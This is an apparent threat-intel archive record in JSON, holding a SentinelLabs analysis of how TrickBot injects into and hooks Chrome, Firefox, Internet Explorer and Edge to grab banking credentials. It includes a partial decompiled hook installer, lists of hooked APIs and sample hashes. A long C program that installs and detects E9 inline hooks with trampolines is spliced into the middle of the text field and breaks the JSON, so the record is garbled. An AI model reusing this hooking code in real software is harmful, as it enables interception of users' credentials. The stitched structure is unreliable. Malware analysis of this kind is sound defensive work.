{
	"id": "e3f1d545-0f56-487f-9a3d-9f849c4b14c0",
	"created_at": "2026-04-06T00:19:06.907293Z",
	"updated_at": "2026-04-10T03:22:00.693768Z",
	"deleted_at": null,
	"sha1_hash": "55adb1cf5a5076ce5a1059e117c38c15d7025853",
	"title": "How TrickBot Malware Hooking Engine Targets Windows 10 Browsers - SentinelLabs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2656048,
	"plain_text": "How TrickBot Malware Hooking Engine Targets Windows 10 Browsers - SentinelLabs\r\nBy Vitali Kremez\r\nPublished: 2019-10-24 · Archived: 2026-04-05 21:10:12 UTC\r\nVitali Kremez reveals how TrickBot’s hooking engine targets Chrome, Firefox, Internet Explorer and Edge on Windows 10.\r\nWhat is TrickBot Malware? Background \u0026 Summary\r\nTrickBot banking malware remains one of the more interesting and continually developing malware families on the financial crimeware landscape. It employs multiple means and methods to exploit compromised machines of interest. The focus of this post is to cover in depth its browser hooking engine, including the hooks it places in Microsoft Edge on Windows 10. We will focus on the internals and on how TrickBot sets up hooks in these browsers for the API calls it is interested in. The ultimate goal of the browser hooking is to intercept online banking credentials before they are SSL encrypted; the stolen credentials can subsequently be used for account takeover (ATO) fraud.\r\nhttps://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/\r\nPage 1 of 10\r\nSince Windows 10 came with a new browser, Microsoft Edge, TrickBot operators needed their banking malware to operate on that software. To implement form grabbing and web injection in the Windows 10 Edge browser, TrickBot’s rogue rtlbroker module hooks the microsoftedgecp.exe process. Normally, runtimebroker.exe is the parent process of the Microsoft Edge browser on Windows 10 machines.\r\nTrickBot Browser Process Injection Technique “Reflective Loader”\r\nIn order to hook browser functions, TrickBot injects its payload into the browser of choice via the so-called ReflectiveLoader methodology.
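The hooking engine dissected later in this post (a 0xE9 JMP rel32 written over the API prologue, a trampoline holding the displaced bytes, NOP/RETN padding in front of the hook) can be modelled on plain byte buffers. The following is an added example written for this edition, not code from SentinelLabs or from the TrickBot sample: it builds the 5-byte patch, relocates the stolen prologue bytes into a trampoline that jumps back past them, and then runs the check a defender would run over a loaded module to spot such a detour. The prologue bytes, the addresses (target at 0x77001000, hook at 0x10005000, trampoline at 0x00300000) and the module bounds are constructed assumptions; the instruction-length table covers only the prologue forms used here, whereas the engine the post decompiles (its walker_byte_0) needs a full x86 length decoder.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

/* Added example, not TrickBot or SentinelLabs code: the E9 inline-hook layout
   and a detector for it, worked on byte buffers so it runs on any host. All
   prologue bytes, addresses and module bounds are constructed (assumptions). */

#define OP_JMP_REL32 0xE9
#define OP_NOP       0x90
#define OP_RET       0xC3
#define JMP_LEN      5

/* rel32 field of a JMP located at from that lands on to; x86 wraps at 2^32. */
uint32_t jmp_rel32(uint32_t from, uint32_t to) { return to - (from + JMP_LEN); }

void put_le32(uint8_t *p, uint32_t v) {
    p[0] = (uint8_t)v;         p[1] = (uint8_t)(v >> 8);
    p[2] = (uint8_t)(v >> 16); p[3] = (uint8_t)(v >> 24);
}

uint32_t get_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) | ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Instruction length for the 32-bit prologue forms used here (push reg,
   mov r32,r32, op r32,imm8, nop); 0 for anything else. A real engine needs a
   complete x86 length decoder at this point. */
static size_t insn_len(const uint8_t *p, size_t avail) {
    switch (p[0]) {
    case 0x53: case 0x55: case 0x56: case 0x57: case OP_NOP: return 1;
    case 0x8B: return (avail >= 2 && (p[1] & 0xC0) == 0xC0) ? 2 : 0;   /* register-direct form only */
    case 0x83: return (avail >= 3 && (p[1] & 0xC0) == 0xC0) ? 3 : 0;   /* sub/add/and r32, imm8 */
    default:   return 0;
    }
}

/* Bytes to steal: whole instructions until the 5-byte JMP is covered, so the
   trampoline never resumes mid-instruction. Returns 0 on an undecodable opcode. */
size_t stolen_length(const uint8_t *code, size_t len) {
    size_t n = 0;
    while (n < JMP_LEN) {
        size_t l = (n < len) ? insn_len(code + n, len - n) : 0;
        if (l == 0) return 0;
        n += l;
    }
    return n;
}

/* Copy the stolen bytes into the trampoline, append JMP target_va + n, then
   overwrite the target with JMP hook_va and NOP-pad the tail of the last stolen
   instruction. target/trampoline are writable views of memory that lives at
   target_va/trampoline_va in the hooked process. Returns n, or 0 on failure.
   Caveat: a stolen instruction with a relative operand (call/jmp/jcc) would
   need fixing up; the table above never steals one. */
size_t install_hook(uint8_t *target, size_t target_len, uint32_t target_va,
                    uint32_t hook_va, uint8_t *trampoline, uint32_t trampoline_va) {
    size_t n = stolen_length(target, target_len);
    if (n == 0) return 0;
    for (size_t i = 0; i < n; i++) trampoline[i] = target[i];
    trampoline[n] = OP_JMP_REL32;
    put_le32(trampoline + n + 1, jmp_rel32(trampoline_va + (uint32_t)n, target_va + (uint32_t)n));
    target[0] = OP_JMP_REL32;
    put_le32(target + 1, jmp_rel32(target_va, hook_va));
    for (size_t i = JMP_LEN; i < n; i++) target[i] = OP_NOP;
    return n;
}

/* Detector: skip the NOP/RETN padding the post says TrickBot prepends, then
   flag a JMP rel32 whose destination falls outside [mod_lo, mod_hi), the
   module that exports the function. An intra-module JMP (hotpatch thunk,
   tail call) is left alone. Returns 1 and the destination when hooked. */
int is_inline_hooked(const uint8_t *code, size_t len, uint32_t va,
                     uint32_t mod_lo, uint32_t mod_hi, uint32_t *dest) {
    size_t i = 0;
    while (i < len && (code[i] == OP_NOP || code[i] == OP_RET)) i++;
    if (i + JMP_LEN > len || code[i] != OP_JMP_REL32) return 0;
    uint32_t d = va + (uint32_t)i + JMP_LEN + get_le32(code + i + 1);
    if (d >= mod_lo && d < mod_hi) return 0;
    if (dest) *dest = d;
    return 1;
}

static void dump_hex(const uint8_t *p, size_t n) {   /* putchar only, no format strings */
    for (size_t i = 0; i < n; i++) {
        int hi = p[i] >> 4, lo = p[i] & 0x0F;
        putchar(hi < 10 ? '0' + hi : 'A' + hi - 10);
        putchar(lo < 10 ? '0' + lo : 'A' + lo - 10);
        putchar(i + 1 < n ? ' ' : 10);
    }
}

int main(void) {
    /* Constructed prologue: mov edi,edi; push ebp; mov ebp,esp; sub esp,0x10; ... */
    uint8_t fn[16] = {0x8B,0xFF,0x55,0x8B,0xEC,0x83,0xEC,0x10,0x53,0x56,0x57,0x90,0x90,0x90,0x90,0xC3};
    uint8_t tramp[16] = {0};
    uint8_t db[4];
    uint32_t dest = 0;
    size_t n = install_hook(fn, sizeof fn, 0x77001000u, 0x10005000u, tramp, 0x00300000u);
    dump_hex(fn, 8);                 /* E9 FB 3F 00 99 83 EC 10: JMP 0x10005000, then the untouched tail */
    dump_hex(tramp, n + JMP_LEN);    /* 8B FF 55 8B EC E9 FB 0F D0 76: stolen bytes, JMP 0x77001005 */
    if (is_inline_hooked(fn, sizeof fn, 0x77001000u, 0x77000000u, 0x77100000u, &dest)) {
        put_le32(db, dest);
        dump_hex(db, 4);             /* 00 50 00 10: hook destination 0x10005000, little-endian */
    }
    return 0;
}
```

On a live Windows process the same patch bytes are written only after VirtualProtectEx has made the target page PAGE_EXECUTE_READWRITE (0x40), exactly as in the decompiled installer later in the post. The detector deliberately keys on the destination leaving the exporting module rather than on the E9 byte alone, because a JMP rel32 at a function entry is common for legitimate thunks; the leading NOP and RETN skip is there because the post states TrickBot prepends those bytes to hide the patch.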
\r\nThe TrickBot process injection function targets four browsers, from Microsoft Edge to Google Chrome, plus one Microsoft Edge-related process.\r\nTrickBot injects the malware into the following processes:\r\nchrome.exe\r\niexplore.exe\r\nfirefox.exe\r\nmicrosoftedgecp.exe\r\nruntimebroker.exe\r\nThe malware also “relaxes” browser security settings and writes the changed files locally before injection occurs.\r\nTrickBot’s reflective injection works as follows:\r\nOpen the target process and allocate memory in it via VirtualAllocEx\r\nCopy the loader function into the allocated memory via WriteProcessMemory\r\nCopy the shellcode into the allocated memory via WriteProcessMemory\r\nCall FlushInstructionCache so that the CPU executes the newly written code rather than a stale cached copy\r\nCall the remote-thread injection routine\r\nCall ResumeThread\r\nOtherwise, call the undocumented API function RtlCreateUserThread to start execution in the remote process, using the offset of the reflective loader function as the entry point.\r\nTrickBot Malware Hooking Engine\r\nWhen TrickBot hooks an API function, execution enters the replacement function, which checks that the process is microsoftedgecp.exe and passes control to the original function when the hook concludes.\r\nThe basic TrickBot banking API hooking template is as follows:\r\n\"CreateHook_API\" Function Template -\u003e\r\n{ int CreateHook_API(LPCSTR DLL_name, int original_function_name,\r\nint myHook_function, int address_of_original_function) }\r\nBy and large, the TrickBot hooking engine works by overwriting the first bytes of the target API with a redirect to its own function using the 0xE9 opcode, which is a JMP with a 32-bit 
relative offset. TrickBot uses a trampoline function, and before writing the hook it calls VirtualProtectEx to give the target page the 0x40 (PAGE_EXECUTE_READWRITE) protection. Additionally, it attempts to evade detection of the hook by prepending NOP and/or RETN instructions.\r\nThe TrickBot hook installer, as decompiled, is as follows (two argument lists are truncated in the original listing and are left as they appear; the listing itself ends before the function does):\r\nsigned int __cdecl TrickBot_Hook_Install(int myHook_function, int *function_address)\r\n{\r\n    char *original_function;       /* hook descriptor: +1 target address, +5 stolen length, +6 saved bytes, +0x24 trampoline */\r\n    char *current_func_id_thread;  /* trampoline start (descriptor + 0x24) */\r\n    int v5;\r\n    char jump_len;                 /* number of prologue bytes displaced by the 5-byte JMP */\r\n    signed int result;\r\n    SIZE_T v8;\r\n    void *trampoline_lpvoid;\r\n    int v10;\r\n    int v11;\r\n    unsigned __int8 jmp_32_bit_relative_offset_opcode;\r\n    int relative_offset;           /* laid out right after the opcode byte on the stack; written together with it below */\r\n    DWORD flOldProtect;\r\n\r\n    original_function = func_name;\r\n    current_func_id_thread = func_name + 0x24;\r\n    iter_func(func_name + 0x24, 0x90, 0x23);   /* fill the 0x23-byte trampoline with NOP */\r\n    /* instruction-length walk: whole instructions covering at least the 5 patch bytes */\r\n    if ( function_address )\r\n        jump_len = walker_byte_0(*(_BYTE **)(original_function + 1), (int)current_func_id_th\r\n    else\r\n        jump_len = 5;\r\n    original_function[5] = jump_len;\r\n    if ( !jump_len )\r\n        goto LABEL_12;\r\n    /* save the prologue bytes that the JMP will overwrite */\r\n    write_hook_iter((int)(original_function + 6), *(_BYTE **)(original_function + 1), (un\r\n    if ( function_address )\r\n        *function_address = (int)current_func_id_thread;   /* the caller gets the trampoline as the original function */\r\n    relative_offset = myHook_function - *(_DWORD *)(original_function + 1) - 5;   /* rel32 = hook - target - 5 */\r\n    v8 = (unsigned __int8)original_function[5];\r\n    trampoline_lpvoid = *(void **)(original_function + 1);\r\n    jmp_32_bit_relative_offset_opcode = 0xE9u;\r\n    /* handle -1 is the current process; 0x40 is PAGE_EXECUTE_READWRITE */\r\n    if ( VirtualProtectEx((HANDLE)0xFFFFFFFF, trampoline_lpvoid, v8, 0x40u, \u0026flOldProtect) )\r\n    {\r\n        v10 = *(_DWORD *)(original_function + 1);\r\n        v11 = (unsigned __int8)original_function[5] - (_DWORD)original_function - 0x47;\r\n        original_function[66] = 0xE9u;                       /* JMP at descriptor + 0x42 ... */\r\n        *(_DWORD *)(original_function + 0x43) = v10 + v11;   /* ... back to target + jump_len, rel32 taken from descriptor + 0x47 */\r\n        write_hook_iter(v10, \u0026jmp_32_bit_relative_offset_opcode, 5);   /* write E9 plus rel32 over the target prologue */\r\n        VirtualProtectEx(\r\n            (HANDLE)0xFFFFFFFF,\r\n            *(LPVOID *)(original_function + 1),\r\n            (unsigned __int8)original_function[5],\r\n            flOldProtect,\r\n            \u0026flOldProtect);                                /* restore the original page protection */\r\n        result = 1;\r\nFor instance, TrickBot sets up its own custom myCreateProcessA function after hooking CreateProcessA. The idea is to catch any launch of microsoftedgecp.exe and intercept it for subsequent injection. This function ultimately returns flow to CreateProcessA after intercepting and collecting the process execution information it needs.\r\nThe following four API calls are hooked in the Microsoft Edge child process via the rogue rtlbroker.dll, allowing TrickBot operators to intercept and manipulate Microsoft Edge process creation:\r\nCreateProcessA\r\nCreateProcessW\r\nCreateProcessAsUserA\r\nCreateProcessAsUserW\r\nTrickBot hooks the following wininet.dll API calls in Internet Explorer and Microsoft Edge:\r\nHttpSendRequestA\r\nHttpSendRequestW\r\nHttpSendRequestExA\r\nHttpSendRequestExW\r\nInternetCloseHandle\r\nInternetReadFile\r\nInternetReadFileExA\r\nInternetQueryDataAvailable\r\nHttpQueryInfoA\r\nInternetWriteFile\r\nHttpEndRequestA\r\nHttpEndRequestW\r\nInternetQueryOptionA\r\nInternetQueryOptionW\r\nInternetSetOptionA\r\nInternetSetOptionW\r\nHttpOpenRequestA\r\nHttpOpenRequestW\r\nInternetConnectA\r\nInternetConnectW\r\nThe malware hooks the following nspr4.dll API calls in Mozilla Firefox:\r\nPR_OpenTCPSocket\r\nPR_Connect\r\nPR_Close\r\nPR_Write\r\nPR_Read\r\nIt hooks the following chrome.dll functions in Google Chrome:\r\nssl_read\r\nssl_write\r\nReference (SHA1)\r\ninjectDll32.dll C546D40D411D0F0BB7A1C9986878F231342CDF8B\r\nrtlbrokerDll.dll 0785D0C5600D9C096B75CC4465BE79D456F60594\r\ntestnewinj32Dll.dll D5F98BFF5E33A86B213E05344BD402350FC5F7CD\r\nSource: https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://labs.sentinelone.com/how-trickbot-hooking-engine-targets-windows-10-browsers/"
	],
	"report_names": [
		"how-trickbot-hooking-engine-targets-windows-10-browsers"
	],
	"threat_actors": [],
	"ts_created_at": 1775434746,
	"ts_updated_at": 1775791320,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/55adb1cf5a5076ce5a1059e117c38c15d7025853.pdf",
		"text": "https://archive.orkl.eu/55adb1cf5a5076ce5a1059e117c38c15d7025853.txt",
		"img": "https://archive.orkl.eu/55adb1cf5a5076ce5a1059e117c38c15d7025853.jpg"
	}
}